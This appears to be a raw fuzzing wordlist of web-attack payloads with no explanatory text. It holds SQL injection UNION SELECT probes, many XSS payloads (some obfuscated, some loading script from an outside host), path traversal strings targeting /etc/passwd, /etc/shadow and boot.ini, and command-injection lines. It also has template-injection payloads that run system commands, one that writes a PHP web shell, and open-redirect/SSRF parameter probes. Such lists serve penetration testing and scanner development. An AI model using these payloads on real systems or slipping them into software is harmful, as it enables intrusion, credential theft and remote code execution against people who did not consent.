UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX'-- | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2-- | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3-- | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4-- | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5-- | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6-- | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7-- | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8-- | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9-- | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10-- | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11-- | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12-- | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13-- | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14-- | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15-- | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16-- | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17-- | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26-- | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX'# | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2# | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3# | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4# | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5# | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6# | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7# | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8# | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9# | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10# | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11# | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12# | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13# | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14# | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15# | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16# | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17# | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18# | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19# | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20# | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21# | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22# | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23# | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24# | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25# | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26# | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27# | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28# | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29# | |
UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30# | |
<script>alert('XSS')</script> | |
<scr<script>ipt>alert('XSS')</scr<script>ipt> | |
"><script>alert('XSS')</script> | |
"><script>alert(String.fromCharCode(88,83,83))</script> | |
<img src=x onerror=alert('XSS');> | |
<img src=x onerror=alert(String.fromCharCode(88,83,83));> | |
<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));> | |
<img src=x:alert(alt) onerror=eval(src) alt=xss> | |
"><img src=x onerror=alert('XSS');> | |
"><img src=x onerror=alert(String.fromCharCode(88,83,83));> | |
<svgonload=alert(1)> | |
<svg/onload=alert('XSS')> | |
<svg/onload=alert(String.fromCharCode(88,83,83))> | |
<svg id=alert(1) onload=eval(id)> | |
"><svg/onload=alert(String.fromCharCode(88,83,83))> | |
"><svg/onload=alert(/XSS/) | |
<body onload=alert(/XSS/.source)> | |
<input autofocus onfocus=alert(1)> | |
<select autofocus onfocus=alert(1)> | |
<textarea autofocus onfocus=alert(1)> | |
<keygen autofocus onfocus=alert(1)> | |
<video/poster/onerror=alert(1)> | |
<video><source onerror="javascript:alert(1)"> | |
<video src=_ onloadstart="alert(1)"> | |
<details/open/ontoggle="alert`1`"> | |
<audio src onloadstart=alert(1)> | |
<marquee onstart=alert(1)> | |
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> | |
<meta/content="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgxMzM3KTwvc2NyaXB0Pg=="http-equiv=refresh> | |
data:text/html,<script>alert(0)</script> | |
data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+ | |
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e | |
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg"> | |
" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)// | |
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT> | |
javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/* | |
javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a | |
javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/ | |
javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/* | |
javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/* | |
javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()// | |
javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/* | |
--></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/* | |
/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/* | |
javascript://--></title></style></textarea></script><svg "//' onclick=alert()// | |
/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/* | |
<object onafterscriptexecute=confirm(0)> | |
<object onbeforescriptexecute=confirm(0)> | |
<script>window['alert'](document['domain'])<script> | |
<img src='1' onerror/=alert(0) /> | |
<script>window['alert'](0)</script> | |
<script>parent['alert'](1)</script> | |
<script>self['alert'](2)</script> | |
<script>top['alert'](3)</script> | |
"><svg onload=alert(1)// | |
"onmouseover=alert(1)// | |
"autofocus/onfocus=alert(1)// | |
'-alert(1)-' | |
'-alert(1)// | |
\'-alert(1)// | |
</script><svg onload=alert(1)> | |
<x contenteditable onblur=alert(1)>lose focus! | |
<x onclick=alert(1)>click this! | |
<x oncopy=alert(1)>copy this! | |
<x oncontextmenu=alert(1)>right click this! | |
<x oncut=alert(1)>copy this! | |
<x ondblclick=alert(1)>double click this! | |
<x ondrag=alert(1)>drag this! | |
<x contenteditable onfocus=alert(1)>focus this! | |
<x contenteditable oninput=alert(1)>input here! | |
<x contenteditable onkeydown=alert(1)>press any key! | |
<x contenteditable onkeypress=alert(1)>press any key! | |
<x contenteditable onkeyup=alert(1)>press any key! | |
<x onmousedown=alert(1)>click this! | |
<x onmousemove=alert(1)>hover this! | |
<x onmouseout=alert(1)>hover this! | |
<x onmouseover=alert(1)>hover this! | |
<x onmouseup=alert(1)>click this! | |
<x contenteditable onpaste=alert(1)>paste here! | |
<script>alert(1)// | |
<script>alert(1)<!– | |
<script src=//brutelogic.com.br/1.js> | |
<script src=//3334957647/1> | |
%3Cx onxxx=alert(1) | |
<%78 onxxx=1 | |
<x %6Fnxxx=1 | |
<x o%6Exxx=1 | |
<x on%78xx=1 | |
<x onxxx%3D1 | |
<X onxxx=1 | |
<x OnXxx=1 | |
<X OnXxx=1 | |
<x onxxx=1 onxxx=1 | |
<x/onxxx=1 | |
<x%09onxxx=1 | |
<x%0Aonxxx=1 | |
<x%0Conxxx=1 | |
<x%0Donxxx=1 | |
<x%2Fonxxx=1 | |
<x 1='1'onxxx=1 | |
<x 1="1"onxxx=1 | |
<x </onxxx=1 | |
<x 1=">" onxxx=1 | |
<http://onxxx%3D1/ | |
<x onxxx=alert(1) 1=' | |
<svg onload=setInterval(function(){with(document)body.appendChild(createElement('script')).src='//HOST:PORT'},0)> | |
'onload=alert(1)><svg/1=' | |
'>alert(1)</script><script/1=' | |
*/alert(1)</script><script>/* | |
*/alert(1)">'onload="/*<svg/1=' | |
`-alert(1)">'onload="`<svg/1=' | |
*/</script>'>alert(1)/*<script/1=' | |
<script>alert(1)</script> | |
<script src=javascript:alert(1)> | |
<iframe src=javascript:alert(1)> | |
<embed src=javascript:alert(1)> | |
<a href=javascript:alert(1)>click | |
<math><brute href=javascript:alert(1)>click | |
<form action=javascript:alert(1)><input type=submit> | |
<isindex action=javascript:alert(1) type=submit value=click> | |
<form><button formaction=javascript:alert(1)>click | |
<form><input formaction=javascript:alert(1) type=submit value=click> | |
<form><input formaction=javascript:alert(1) type=image value=click> | |
<form><input formaction=javascript:alert(1) type=image src=SOURCE> | |
<isindex formaction=javascript:alert(1) type=submit value=click> | |
<object data=javascript:alert(1)> | |
<iframe srcdoc=<svg/onload=alert(1)>> | |
<svg><script xlink:href=data:,alert(1) /> | |
<math><brute xlink:href=javascript:alert(1)>click | |
<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&> | |
<html ontouchstart=alert(1)> | |
<html ontouchend=alert(1)> | |
<html ontouchmove=alert(1)> | |
<html ontouchcancel=alert(1)> | |
<body onorientationchange=alert(1)> | |
"><img src=1 onerror=alert(1)>.gif | |
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/> | |
GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//; | |
<script src="data:,alert(1)// | |
"><script src=data:,alert(1)// | |
<script src="//brutelogic.com.br/1.js# | |
"><script src=//brutelogic.com.br/1.js# | |
<link rel=import href="data:text/html,<script>alert(1)</script> | |
"><link rel=import href=data:text/html,<script>alert(1)</script> | |
<base href=//0> | |
<script/src="data:,eval(atob(location.hash.slice(1)))//#alert(1) | |
<body onload=alert(1)> | |
<body onpageshow=alert(1)> | |
<body onfocus=alert(1)> | |
<body onhashchange=alert(1)><a href=#x>click this!#x | |
<body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x | |
<body onscroll=alert(1)><br><br><br><br> | |
<body onresize=alert(1)>press F12! | |
<body onhelp=alert(1)>press F1! (MSIE) | |
<marquee onstart=alert(1)> | |
<marquee loop=1 width=0 onfinish=alert(1)> | |
<audio src onloadstart=alert(1)> | |
<video onloadstart=alert(1)><source> | |
<input autofocus onblur=alert(1)> | |
<keygen autofocus onfocus=alert(1)> | |
<form onsubmit=alert(1)><input type=submit> | |
<select onchange=alert(1)><option>1<option>2 | |
<menu id=x contextmenu=x onshow=alert(1)>right click me! | |
<script>\u0061\u006C\u0065\u0072\u0074(1)</script> | |
<img src="1" onerror="alert(1)" /> | |
<iframe src="javascript:%61%6c%65%72%74%28%31%29"></iframe> | |
<script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"("+$.___+")"+"\"")())();</script> | |
<script>(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()</script> | |
<img src=1 alt=al lang=ert onerror=top[alt+lang](0)> | |
<script>$=1,alert($)</script> | |
<script ~~~>confirm(1)</script ~~~> | |
<script>$=1,\u0061lert($)</script> | |
<</script/script><script>eval('\\u'+'0061'+'lert(1)')//</script> | |
<</script/script><script ~~~>\u0061lert(1)</script ~~~> | |
</style></scRipt><scRipt>alert(1)</scRipt> | |
<img/id="alert('XSS')\"/alt=\"/\"src=\"/\"onerror=eval(id)> | |
<img src=x:prompt(eval(alt)) onerror=eval(src) alt=String.fromCharCode(88,83,83)> | |
<svg><x><script>alert('1')</x> | |
<iframe src=""/srcdoc='<svg onload=alert(1)>'> | |
/.../.../.../.../.../ | |
\…..\\\…..\\\…..\\\ | |
%00../../../../../../etc/passwd | |
%00/etc/passwd%00 | |
%00../../../../../../etc/shadow | |
%00/etc/shadow%00 | |
%0a/bin/cat%20/etc/passwd | |
%0a/bin/cat%20/etc/shadow | |
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 | |
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%00 | |
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 | |
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini | |
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini | |
/../../../../../../../../%2A | |
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini | |
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd | |
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow | |
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd | |
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow | |
..%2F..%2F..%2F%2F..%2F..%2F%2Fvar%2Fnamed | |
..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd | |
..%2F..%2F..%2F%2F..%2F..%2Fetc/shadow | |
=3D “/..†. “%2f.. | |
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/boot.ini | |
admin/access_log | |
/admin/install.php | |
../../../administrator/inbox | |
/apache2/logs/access_log | |
/apache2/logs/access.log | |
/apache2/logs/error_log | |
/apache2/logs/error.log | |
/apache/logs/access_log | |
/apache/logs/access.log | |
../../../../../apache/logs/access.log | |
../../../../apache/logs/access.log | |
../../../apache/logs/access.log | |
../../apache/logs/access.log | |
../apache/logs/access.log | |
/apache/logs/error_log | |
/apache/logs/error.log | |
../../../../../apache/logs/error.log | |
../../../../apache/logs/error.log | |
../../../apache/logs/error.log | |
../../apache/logs/error.log | |
../apache/logs/error.log | |
/apache\php\php.ini | |
\\'/bin/cat%20/etc/passwd\\' | |
\\'/bin/cat%20/etc/shadow\\' | |
/.bash_history | |
/.bash_profile | |
/.bashrc | |
/../../../../../../../../bin/id| | |
/bin/php.ini | |
/boot/grub/grub.conf | |
/./././././././././././boot.ini | |
/../../../../../../../../../../../boot.ini | |
/..\../..\../..\../..\../..\../..\../boot.ini | |
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini | |
..//..//..//..//..//boot.ini | |
../../../../../../../../../../../../boot.ini | |
../../boot.ini | |
..\../..\../..\../..\../boot.ini | |
..\../..\../boot.ini | |
..\..\..\..\..\..\..\..\..\..\boot.ini | |
\..\..\..\..\..\..\..\..\..\..\boot.ini | |
{$smarty.version} | |
{php}echo `id`;{/php} | |
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())} | |
/../../../../../../../../../../../boot.ini%00 | |
<#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")} | |
[#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')} | |
${"freemarker.template.utility.Execute"?new()("id")} | |
../../../../../../../../../../../../boot.ini%00 | |
{{ someString.toUPPERCASE() }} | |
{{ variable.getClass().forName('java.lang.Runtime').getRuntime().exec('ls -la') }} | |
/$collabplz | |
?targetOrigin=$collabplz | |
?fallback=$collabplz | |
?query=$collabplz | |
?redirection_url=$collabplz | |
?next=$collabplz | |
?ref_url=$collabplz | |
?state=$collabplz | |
?l=$collabplz | |
?redirect_uri=$collabplz | |
?forum_reg=$collabplz | |
?return_to=$collabplz | |
?redirect_url=$collabplz | |
?return_url=$collabplz | |
?host=$collabplz | |
?url=$collabplz | |
?redirectto=$collabplz | |
?return=$collabplz | |
?prejoin_data=$collabplz | |
?callback_url=$collabplz | |
?path=$collabplz | |
?authorize_callback=$collabplz | |
?email=$collabplz | |
?origin=$collabplz | |
?continue=$collabplz | |
?domain_name=$collabplz | |
?redir=$collabplz | |
?wp_http_referer=$collabplz | |
?endpoint=$collabplz | |
?shop=$collabplz | |
?qpt_question_url=$collabplz | |
?checkout_url=$collabplz | |
?ref_url=$collabplz | |
?redirect_to=$collabplz | |
?succUrl=$collabplz | |
?file=$collabplz | |
?link=$collabplz | |
?referrer=$collabplz | |
?recipient=$collabplz | |
?redirect=$collabplz | |
?u=$collabplz | |
?hostname=$collabplz | |
?returnTo=$collabplz | |
?return_path=$collabplz | |
?image=$collabplz | |
?requestTokenAndRedirect=$collabplz | |
?retURL=$collabplz | |
?next_url=$collabplz | |
<pre>{% debug %}</pre> | |
{% debug %} | |
{{ [].class.base.subclasses() }} | |
{{''.class.mro()[1].subclasses()}} | |
{{ ''.__class__.__mro__[2].__subclasses__() }} | |
..\..\..\..\..\..\..\..\..\..\boot.ini%00 | |
/../../../../../../../../../../../boot.ini%00.html | |
/../../../../../../../../../../../boot.ini%00.jpg | |
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd | |
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini | |
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd | |
